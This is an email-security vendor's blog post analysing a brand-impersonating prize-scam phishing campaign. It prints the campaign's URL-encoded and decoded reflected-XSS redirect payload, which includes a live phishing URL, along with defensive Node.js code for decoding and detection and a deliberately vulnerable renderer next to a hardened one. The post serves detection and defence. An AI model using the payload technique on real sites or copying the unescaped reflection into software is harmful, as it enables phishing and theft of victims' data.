Email Security Blog

Fresh Phish: Cross Site Scripting Leveraged In This New Prize Scam

If you’ve ever bought a raffle ticket, purchased a lottery ticket, or called into a radio station for concert tickets, you’ve pictured yourself on the winning side of a prize. It’s a nice feeling. Whether you chalk it up to serotonin, dopamine, or human nature, winning makes us feel good.

Cybercriminals like to win too. Perhaps that’s why they have been devising prize-winning schemes for years. In fact, according to the FBI, in 2023 victims lost more than $9.5 million to fake prize-winning schemes.1 However, the new phishing threat INKY caught plays by its own set of rules and could be a real game-changer for those hoping to disguise malicious links.

Malicious Re-Direct Scripts Leverage Cross-Site Scripting

INKY has discovered an increase in phishing emails using malicious redirect scripts in URL-encoded links.

A Word About URL Encoding: URL encoding (percent-encoding) converts characters that are not allowed in a URL, or that have special meaning in one, into a form that can be transmitted safely. Each such byte is written as a "%" followed by two hexadecimal digits; in form-encoded query strings a space may also be written as "+". Special characters like "<", ">", "/", and "'" become %3C, %3E, %2F, and %27. Then, to the delight of cybercriminals everywhere, the encoding is reversed automatically: the web server decodes the query parameter before using it, and if the site writes that decoded value into its page without escaping it, the browser renders whatever HTML and script the value contains. The encoded form that a mail scanner or a wary recipient sees looks nothing like the markup that ends up in the page.


For now, this technique has only appeared in prize scams that impersonate reputable brands like Costco, YETI, Harbor Freight Tools, and Lowes. Let’s take a closer look at a Costco phishing email example.

The message below appears to be a notice of an expired membership. However, read a little more closely and you’ll see the email offers to extend your membership for free!

[Image: the Costco "expired membership" phishing email]

Clicking “Extend for Free” opens a page on a malicious site impersonating Costco. From there, clicking “Extend Now” leads to a harvesting form that collects personal and financial information.

[Image: the Costco lookalike page and the harvesting form]

A Closer Look at the Encoded URL

To understand how this phishing email actually works, we need to take a closer look at the encoded URL. With this technique, phishers route the click through a third-party domain such as scoperac[.]com, which serves as the redirect, and nearly everything after the query parameter (“q=”) is URL-encoded.

[Image: the encoded URL as it appears in the phishing link]

A more magnified view looks like this:

8%22%3E%3C%2Fdiv%3E%3C%2F%64%69%76%3E%3Cscript%3Ewindow%5B%27location%27%5D%5B%27replace%27%5D%28%5B%27h%27%2C%20%27t%27%2C%20%27t%27%2C%20%27p%27%2C%20%27s%27%2C%20%27%3A%27%2C%20%27%2F%27%2C%20%27%2F%27%2C%20%27i%27%2C%20%27m%27%2C%20%27p%27%2C%20%27u%27%2C%20%27t%27%2C%20%27e%27%2C%20%27l%27%2C%20%27e%27%2C%20%27t%27%2C%20%27t%27%2C%20%27e%27%2C%20%27r%27%2C%20%27.%27%2C%20%27c%27%2C%20%27o%27%2C%20%27m%27%2C%20%27%2F%27%2C%20%270%27%2C%20%27%2F%27%2C%20%270%27%2C%20%27%2F%27%2C%20%270%27%2C%20%27%2F%27%2C%20%27b%27%2C%20%27f%27%2C%20%273%27%2C%20%27c%27%2C%20%274%27%2C%20%27c%27%2C%20%276%27%2C%20%27a%27%2C%20%273%27%2C%20%270%27%2C%20%27b%27%2C%20%27c%27%2C%20%27d%27%2C%20%276%27%2C%20%271%27%2C%20%278%27%2C%20%273%27%2C%20%275%27%2C%20%272%27%2C%20%272%27%2C%20%271%27%2C%20%271%27%2C%20%27c%27%2C%20%273%27%2C%20%271%27%2C%20%278%27%2C%20%278%27%2C%20%27d%27%2C%20%27d%27%2C%20%27f%27%2C%20%277%27%2C%20%276%27%2C%20%27/13/280-11539/961-367248-14403%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%5B%27opacity%27%5D%3D0x0%3B%3C%2Fscript%3E

The decoded string is:

8"></div></div><script>window['location']['replace'](['h', 't', 't', 'p', 's', ':', '/', '/', 'i', 'm', 'p', 'u', 't', 'e', 'l', 'e', 't', 't', 'e', 'r', '.', 'c', 'o', 'm', '/', '0', '/', '0', '/', '0', '/', 'b', 'f', '3', 'c', '4', 'c', '6', 'a', '3', '0', 'b', 'c', 'd', '6', '1', '8', '3', '5', '2', '2', '1', '1', 'c', '3', '1', '8', '8', 'd', 'd', 'f', '7', '6', '/13/280-11539/961-367248-14403']['join']('')),document['body']['style']['opacity']=0x0;</script>

What INKY found is JavaScript that the third-party site reflects into its own page, where it redirects the browser to a new location. The leading 8"></div></div> is consistent with the q= value being written into a quoted attribute: it closes that attribute and the enclosing elements so that the <script> element which follows is parsed as live markup. The script builds the destination URL from an array in which every character of the address is its own quoted element, separated by commas, and joins them with join(''). Read in order, the letters spell out the URL, and that is exactly how the browser assembles the link at run time. The point of the split is that the phishing domain never appears as a contiguous string in the link, so simple keyword or URL matching does not see it.

In this case, the final URL is:

https://imputeletter.com/0/0/0/bf3c4c6a30bcd618352211c3188ddf76/13/280-11539/961-367248-14403

Additionally, the script sets the opacity of the document body to 0x0, the hexadecimal spelling of 0, which hides the contents of the page. window.location.replace() starts the navigation but does not complete it before the next statement runs, so blanking the body keeps the victim from glimpsing the third-party site's own page (or any error it renders) before the Costco lookalike loads. In this sample the script does nothing beyond hiding the page and redirecting. Any script that runs in the vulnerable site's origin, though, has the same access as the site's own code to its DOM and to any cookies not marked HttpOnly, so the flaw is a risk to that site's users as well as to the phishing victims.
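As an added example (not INKY's code, and not part of the original post), the following Node.js script does offline what the vulnerable server and the victim's browser do in sequence: it percent-decodes the q= value, checks whether the result contains a script element, and rebuilds the destination from the character array without executing any of the attacker's JavaScript. The helper names are hypothetical, the host redirect.example stands in for the scoperac[.]com-style domain (the real path is not shown in the post), and only the encoded payload fragments are taken from the sample above.

```javascript
// Added example (not INKY's code): decode the URL-encoded "q=" value from a
// phishing link offline and recover the redirect target that the reflected
// script would build, without executing any JavaScript from the link.
// Helper names are hypothetical; the payload fragments are the encoded string
// from the blog post, and redirect.example is a stand-in host (assumption).

const ENCODED_PAYLOAD = [
  "8%22%3E%3C%2Fdiv%3E%3C%2F%64%69%76%3E%3Cscript%3Ewindow%5B%27location%27%5D%5B%27replace%",
  "27%5D%28%5B%27h%27%2C%20%27t%27%2C%20%27t%27%2C%20%27p%27%2C%20%27s%27%2C%20%27%3A",
  "%27%2C%20%27%2F%27%2C%20%27%2F%27%2C%20%27i%27%2C%20%27m%27%2C%20%27p%27%2C%20%27u",
  "%27%2C%20%27t%27%2C%20%27e%27%2C%20%27l%27%2C%20%27e%27%2C%20%27t%27%2C%20%27t%27%2C",
  "%20%27e%27%2C%20%27r%27%2C%20%27.%27%2C%20%27c%27%2C%20%27o%27%2C%20%27m%27%2C%20%2",
  "7%2F%27%2C%20%270%27%2C%20%27%2F%27%2C%20%270%27%2C%20%27%2F%27%2C%20%270%27%2C%20",
  "%27%2F%27%2C%20%27b%27%2C%20%27f%27%2C%20%273%27%2C%20%27c%27%2C%20%274%27%2C%20%27",
  "c%27%2C%20%276%27%2C%20%27a%27%2C%20%273%27%2C%20%270%27%2C%20%27b%27%2C%20%27c%27%",
  "2C%20%27d%27%2C%20%276%27%2C%20%271%27%2C%20%278%27%2C%20%273%27%2C%20%275%27%2C%20",
  "%272%27%2C%20%272%27%2C%20%271%27%2C%20%271%27%2C%20%27c%27%2C%20%273%27%2C%20%271",
  "%27%2C%20%278%27%2C%20%278%27%2C%20%27d%27%2C%20%27d%27%2C%20%27f%27%2C%20%277%27%2",
  "C%20%276%27%2C%20%27/13/280-11539/961-367248-",
  "14403%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%",
  "5B%27opacity%27%5D%3D0x0%3B%3C%2Fscript%3E",
].join("");

// Constructed sample link: the encoded payload as the q= parameter of a
// stand-in redirect host (the real path from the campaign is not known).
const SAMPLE_LINK = "https://redirect.example/?q=" + ENCODED_PAYLOAD;

// Return the still-encoded value of one query parameter so that the single
// decoding step below is under our control (URLSearchParams would decode it).
function rawQueryParam(url, name) {
  for (const pair of url.search.replace(/^\?/, "").split("&")) {
    const eq = pair.indexOf("=");
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key === name) return eq === -1 ? "" : pair.slice(eq + 1);
  }
  return null;
}

// What the server does before using a form-encoded query value: "+" becomes
// a space, then every %XX sequence becomes the byte it names.
function decodeQueryValue(encoded) {
  return decodeURIComponent(encoded.replace(/\+/g, " "));
}

function containsInjectedScript(decoded) {
  return /<\s*script\b/i.test(decoded);
}

// Find the array of quoted characters handed to ['join']('') or .join('')
// and join it the way the script would, without evaluating anything.
function recoverRedirectTarget(decoded) {
  const arrayCall =
    /(\[\s*(?:'(?:[^'\\]|\\.)*'\s*,?\s*)+\])\s*(?:\[\s*'join'\s*\]|\.join)\s*\(\s*''\s*\)/;
  const m = arrayCall.exec(decoded);
  if (!m) return null;
  const parts = [];
  const literal = /'((?:[^'\\]|\\.)*)'/g;
  let el;
  while ((el = literal.exec(m[1])) !== null) parts.push(el[1]);
  return parts.join("");
}

function analyzeLink(link) {
  const url = new URL(link);
  const raw = rawQueryParam(url, "q");
  const decoded = raw === null ? "" : decodeQueryValue(raw);
  return {
    redirectDomain: url.hostname,
    injectedScript: containsInjectedScript(decoded),
    // opacity assigned zero, including the 0x0 hex spelling used in the sample
    hidesPage: /opacity\W*=\s*0(?:x0)?\b/.test(decoded),
    redirectTarget: recoverRedirectTarget(decoded),
  };
}

// Stand-alone run: print the verdict for the constructed sample link.
console.log(analyzeLink(SAMPLE_LINK));
```

The same check applied to a link whose q= value is ordinary text returns no script, no opacity change and no recovered target, so the two signals together (a script element in a decoded parameter, plus a character array fed to join) are a usable mail-gateway heuristic for this kit. A mail scanner that matches only on the raw link will never see imputeletter.com, because that string exists only after decoding and joining.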

A Great Example of Cross-Site Scripting

In this particular phishing campaign, the script embedded in the URL-encoded string is an example of reflected cross-site scripting (XSS). If you have not come across cross-site scripting before: a website takes a value from the request (here the q= query parameter) and writes it into the page it serves without escaping it, so whoever controls that value can make the site deliver script of their choosing to its visitors. The victim clicks the phisher's link, the browser opens the vulnerable and otherwise unremarkable website, and the page it returns executes the attacker's script. In this campaign the script's only job is to hide the page and forward the browser to the harvesting site; the form on that site is what captures the victim's personal and financial information and delivers it to the attacker.

Due to the large number of similar phish, it’s likely that this cross-site scripting / URL-encoding scheme is a phishing kit available for sale to scammers looking for a new technique. Below are a few more examples of cross-site scripting prize scams.

Example #1: Marriott Phishing Email

[Image: Marriott phishing email]

Example #2: Harbor Freight Phishing Email

[Image: Harbor Freight phishing email]

Example #3: Lowes Phishing Email

Example #4: Tractor Supply Co. Phishing Email Sequence

[Image: Tractor Supply Co. phishing email sequence]

How to Spot a Phishing Prize Scam

According to the Federal Trade Commission, there are three primary signs of a prize scam.2

  1. You’re asked to pay something to get your prize.
  2. The email says paying something increases your odds of winning.
  3. You’re asked to provide financial information.

Recap of Techniques

  • URL-encoded links: the destination is hidden behind percent-encoding and a character-by-character array, so neither the phishing domain nor the injected script appears in plain text in the link, which lets it slip past security scans that match on the raw URL.
  • Cross-site scripting (XSS): injecting script into a page served by another site, here through a query parameter the site reflects without escaping, which gives the attacker control of that page's content and visibility.
  • Brand impersonation: uses elements of a well-known brand to make an email look as if it came from that company.
  • Data harvesting: collecting personal data under false pretenses.

Best Practices: Guidance and Recommendations

  • Carefully inspect the sender’s email address. These emails claim to be from reputable brands like Costco, but none of the sending domains were associated with any of those brands. Recipients who are unsure about a sender should contact the company through a channel other than email.
  • Carefully inspect the domain in the web browser. None of these domains were associated with any of the reputable brands impersonated.
  • These encoded URLs exploit a vulnerability in a website’s server-side code: it writes a value received via a URL parameter into its HTML without escaping it. Website owners should treat every request value as untrusted and encode it for the context in which it is output (HTML body, attribute value, JavaScript string, URL), so that any markup or script in the input is displayed as text rather than executed. Input sanitization alone is not a reliable substitute for output encoding, and a Content Security Policy that does not allow inline script limits the damage when an escaping bug slips through.
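To make the last point concrete, here is an added example in Node.js (not INKY's code, and not taken from any site involved in the campaign): a page fragment that reflects the q= value unescaped, beside the same fragment with output encoding for the HTML attribute context. The markup is hypothetical; the 8"> prefix of the real payload suggests the value was reflected into a quoted attribute, and the example assumes that. The injected value is constructed to have the shape of the campaign's decoded payload, with attacker.example standing in for the harvesting site.

```javascript
// Added example (not INKY's code, not the vulnerable site's code): a minimal
// page renderer that reflects a "q" query value, first the way a site
// susceptible to this campaign would, then with HTML-attribute escaping.
// The markup is hypothetical; attacker.example is a placeholder destination.

// Escape the five characters that can break out of HTML text or a quoted
// attribute. This is output encoding for the HTML context, applied at the
// point where the untrusted value is written into the page.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: the decoded query value is interpolated straight into a quoted
// attribute. A value beginning 8"></div></div> closes the attribute, the tag
// and the two enclosing divs, so the <script> that follows becomes live markup.
function renderVulnerable(q) {
  return '<div class="page"><div class="search">' +
    '<input type="text" name="q" value="' + q + '">' +
    '</div></div>';
}

// HARDENED: same markup, but the value is escaped for the attribute context,
// so the quote, angle brackets and slash are shown as text, not parsed.
function renderHardened(q) {
  return '<div class="page"><div class="search">' +
    '<input type="text" name="q" value="' + escapeHtml(q) + '">' +
    '</div></div>';
}

// Count <script start tags in rendered markup (illustration only; a real
// review would use an HTML parser or CSP violation reports, not a regex).
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed input in the shape of the campaign's decoded q= value, with
// attacker.example standing in for the harvesting site.
const INJECTED_Q =
  "8\"></div></div><script>window['location']['replace']('https://attacker.example/')," +
  "document['body']['style']['opacity']=0x0;</script>";

console.log("vulnerable:", renderVulnerable(INJECTED_Q));
console.log("hardened:  ", renderHardened(INJECTED_Q));
```

For ordinary input the two renderers produce identical output; only the injected value differs, with the hardened version keeping the attribute closed and emitting &lt;script&gt; as visible text. Most modern template engines apply this escaping by default when you use their normal interpolation syntax; the bug is usually an explicit "raw" or "unescaped" helper, or hand-built string concatenation like the vulnerable function above. As defense in depth, serving the page with a Content-Security-Policy header whose script-src does not include 'unsafe-inline' makes the browser refuse to run an inline script element even if it does land in the markup.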

Year after year, phishing threats become more complex and harder to detect. There are, of course, solutions available. INKY provides the most comprehensive malware and email phishing protection available. It scans every sent and delivered email automatically and flags malicious emails, protecting your organization and your clients from even the most complex threats – even cross-site scripting. INKY’s intelligent machine learning algorithms identify abnormalities in emails, even if the threat has never been seen before. INKY’s Email Assistant then warns employees of threats, while protecting and training them at the same time. Rest assured, as busy as your organization is, INKY installation is simple. Most customers are up and running in under an hour – even with remote employees. Schedule a demo or inquire today.

----------------------

INKY is an award-winning, behavioral email security platform that blocks phishing threats, prevents data leaks, and coaches users to make smart decisions. Like a cybersecurity coach, INKY signals suspicious behaviors with interactive email banners that guide users to take safe action on any device or email client. IT teams don’t face the burden of filtering every email themselves or maintaining multiple systems. Through powerful technology and intuitive user engagement, INKY keeps phishers out for good. Learn why so many companies trust the security of their email to INKY. Request an online demonstration today.


1Source: https://www.ic3.gov/Media/PDF/AnnualReport/2023_IC3Report.pdf

2Source: https://consumer.ftc.gov/articles/fake-prize-sweepstakes-and-lottery-scams
